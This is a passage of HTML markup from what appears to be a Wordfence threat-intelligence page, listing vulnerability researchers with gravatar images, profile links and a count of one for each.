					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suyoung-kim" target="_blank" rel="noopener">suyoung kim(AhnLab)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/429c3eb56bea605e95a57ae93ae24c62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="429c3eb56bea605e95a57ae93ae24c62"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener">Nguyen Ba Khanh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f841eaba66a4d4f2f2c47ac96eed83c2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f841eaba66a4d4f2f2c47ac96eed83c2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/murad-akhmedov" target="_blank" rel="noopener">Murad Akhmedov</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b19e3ab80ec15ac158dc093a41425376.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b19e3ab80ec15ac158dc093a41425376"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryoma-nishioka-2" target="_blank" rel="noopener">Ryoma Nishioka</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joost-grunwald" target="_blank" rel="noopener">Joost Grunwald</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6146db281e4e38ef45dd61630c718650.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6146db281e4e38ef45dd61630c718650"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/saulo-rafael" target="_blank" rel="noopener">Saulo Rafael (miquinho)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dee5a1ba25d9dcc842f7d84932cd40d7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dee5a1ba25d9dcc842f7d84932cd40d7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/michael-holmquist" target="_blank" rel="noopener">Michael Holmquist</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d7f9038fb861e9fb261bb8e1fc1e461f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d7f9038fb861e9fb261bb8e1fc1e461f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/msfire" target="_blank" rel="noopener">msfire</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/374d26462b1a550f5378370bf9e5a572.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="374d26462b1a550f5378370bf9e5a572"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sakri-koskimies" target="_blank" rel="noopener">Sakri Koskimies</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7fe5317595b8e4f4fe5505d7bb59d8cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7fe5317595b8e4f4fe5505d7bb59d8cc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez" target="_blank" rel="noopener">Pablo González</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/194d5edb5df95ed8b7295c13d737c8c1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="194d5edb5df95ed8b7295c13d737c8c1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez" target="_blank" rel="noopener">Francisco José Ramírez</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dbebc4226fec7962303fbc0edb916019.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dbebc4226fec7962303fbc0edb916019"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongjun-joo" target="_blank" rel="noopener">seongjun joo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/040569380c3a22465aca62038c02c432.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="040569380c3a22465aca62038c02c432"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/eunho-kim-2" target="_blank" rel="noopener">EUNHO KIM</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/de1f176e39d579ff456e61c79f9cd67d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="de1f176e39d579ff456e61c79f9cd67d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/matheo-beuve" target="_blank" rel="noopener">Matheo Beuve</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c4d4f022dc9a23568fb89d3b328e6cb2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4d4f022dc9a23568fb89d3b328e6cb2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryanthe" target="_blank" rel="noopener">Ryan Fabella</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/75698b97c64a6b5345830f1a03081c09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="75698b97c64a6b5345830f1a03081c09"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/stefan-spasic" target="_blank" rel="noopener">Stefan Spasic</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hermanhms" target="_blank" rel="noopener">hermanhms</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/aec5180695004785c7b14644035d8482.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aec5180695004785c7b14644035d8482"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/blast" target="_blank" rel="noopener">blast</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cd4a85e790b6360849ccaf9de39d1ad4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd4a85e790b6360849ccaf9de39d1ad4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tharadol-suksamran" target="_blank" rel="noopener">Tharadol Suksamran (d3kc4rt_1)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0c2053c5e38932b707ceb155acd65993.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0c2053c5e38932b707ceb155acd65993"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/josh-bolding" target="_blank" rel="noopener">Josh Bolding</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/viridis" target="_blank" rel="noopener">viridis</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7a92419c78a0e5709d91cfa2ce19447d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7a92419c78a0e5709d91cfa2ce19447d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ayukiab" target="_blank" rel="noopener">Ayukiab</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1ffbed81dd7ad7b6f1301707d20b20a8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ffbed81dd7ad7b6f1301707d20b20a8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/xiang-li-liu" target="_blank" rel="noopener">Evan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a5e6ae3bd4b10178c1dfaeb2bb6b91c4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a5e6ae3bd4b10178c1dfaeb2bb6b91c4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-huu-do-2" target="_blank" rel="noopener">Nguyen Huu Do</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5a50351dc3a5975487697a55ad3936d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a50351dc3a5975487697a55ad3936d5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener">UKO</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2f88909837ee7c1b94a4ff2e0b7f519d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2f88909837ee7c1b94a4ff2e0b7f519d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hasyros" target="_blank" rel="noopener">Hasyros</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/254001b8e88f4f8e7835efdbc417a206.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="254001b8e88f4f8e7835efdbc417a206"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ricky-morty" target="_blank" rel="noopener">ricky morty</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2c1a583af8cd2aa13e2d25605e8e1ed9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2c1a583af8cd2aa13e2d25605e8e1ed9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rahul-yadav" target="_blank" rel="noopener">Rahul Yadav</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/873c27ed0a722f416e61978f85480b26.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="873c27ed0a722f416e61978f85480b26"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kenny" target="_blank" rel="noopener">Kenny</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ee46d8ed5f17142621d8d0c597904ec0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ee46d8ed5f17142621d8d0c597904ec0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-pas" target="_blank" rel="noopener">AlexHenry</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9c8a9a9336b6784674549968d486619b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9c8a9a9336b6784674549968d486619b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wp-cloud-plugins" target="_blank" rel="noopener">WP Cloud Plugins</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a895eb6a51534d63fc655b6bfbd8d88e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a895eb6a51534d63fc655b6bfbd8d88e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/furkan-arslan" target="_blank" rel="noopener">Furkan Arslan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c54963ce7f0451af98c05e1b494dc7ea.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c54963ce7f0451af98c05e1b494dc7ea"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/romain-deperne" target="_blank" rel="noopener">Romain Deperne (ang3L)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2968a83547342a0cfd609bc354946f45.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2968a83547342a0cfd609bc354946f45"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/c-y" target="_blank" rel="noopener">Scc2</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3a44d04cdd3490b305d8f18cf157f1fd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3a44d04cdd3490b305d8f18cf157f1fd"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-hartinger" target="_blank" rel="noopener">mad4cyber</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6850e6e9fde2fb4afa5c90fd6bb8b6c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6850e6e9fde2fb4afa5c90fd6bb8b6c9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener">Mohammed Abd Alrahman</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4c02b90fc5c8f1415e07705b0e258922.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c02b90fc5c8f1415e07705b0e258922"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/claudio-marchesini-2" target="_blank" rel="noopener">Claudio Marchesini</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/702cb979a155465bdbe1e65251943e3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="702cb979a155465bdbe1e65251943e3e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hdwsec" target="_blank" rel="noopener">HDWSec</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a4519363cef6c616216a8628cc67a9ff.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a4519363cef6c616216a8628cc67a9ff"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/po-wei-ting-2" target="_blank" rel="noopener">PO-WEI TING</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7b4e26ad7157dc90de24d351d548e3c3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7b4e26ad7157dc90de24d351d548e3c3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/open-information-security-inc" target="_blank" rel="noopener">Open Information Security Inc</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/39a7def5853f4863ea01b33211f8312b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="39a7def5853f4863ea01b33211f8312b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kamphon" target="_blank" rel="noopener">Powpy</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a50fdfd0923a437363689c1971acafda.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a50fdfd0923a437363689c1971acafda"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jtb75" target="_blank" rel="noopener">jtb75</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8ec93bb7e5ec96ab4636699e413382c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8ec93bb7e5ec96ab4636699e413382c9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener">Tin Pham (TF1T)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4418c9327e7455cc20ecc3238895e0d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4418c9327e7455cc20ecc3238895e0d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener">Trong Pham (dtro)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/686db785ef138a2df1f8279970662a2a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="686db785ef138a2df1f8279970662a2a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hao-ngo" target="_blank" rel="noopener">Hao Ngo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d38c2bce8856249cf398ccf5a50ebe63.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d38c2bce8856249cf398ccf5a50ebe63"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener">TruongLV1 From FPT Night Wolf</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f8da36de0b16927a052e4eb0878abbfb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8da36de0b16927a052e4eb0878abbfb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener">lhking</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/edab1e5d7caf79446c62ca10a30be386.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="edab1e5d7caf79446c62ca10a30be386"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mariusz-maik" target="_blank" rel="noopener">s00me00ne</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/paulos-yibelo" target="_blank" rel="noopener">Paulos Yibelo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9786d2004e23d165ca5600a93fa2c533.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9786d2004e23d165ca5600a93fa2c533"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener">Nir Yehoshua</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8c6c94a4b473f99248f1373f13eaf816.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8c6c94a4b473f99248f1373f13eaf816"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nikhil-gavhane" target="_blank" rel="noopener">Nikhil Gavhane</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5a19309c7588118bbb096d9abba61ead.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a19309c7588118bbb096d9abba61ead"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/helder-goncalves" target="_blank" rel="noopener">Helder Gonçalves</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/70a475bab665724f74ae237f9744cf62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="70a475bab665724f74ae237f9744cf62"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hassan-khan-yusufzai-2" target="_blank" rel="noopener">Hassan Khan Yusufzai</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/eefe3705b8f48b48303d7a95fe7a0ec3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="eefe3705b8f48b48303d7a95fe7a0ec3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener">Adrien Brunner</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b2c7419e5c28acc276078327dd3fb37b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b2c7419e5c28acc276078327dd3fb37b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sorra" target="_blank" rel="noopener">Sorra</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3b95ab4bfdfee3dfe4486b79b2098242.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3b95ab4bfdfee3dfe4486b79b2098242"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/crow" target="_blank" rel="noopener">crow</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
